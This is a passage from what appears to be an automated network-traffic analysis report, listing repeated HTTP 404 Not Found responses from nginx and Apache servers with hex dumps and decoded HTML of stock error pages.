3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:05:06 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:05:08 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:05:11 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 08:05:14 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:05:33 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:05:36 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:05:38 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:05:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:06:00 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:06:02 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:06:05 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:06:08 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66938482-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 08:06:14 GMTServer: ApacheContent-Length: 4395Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 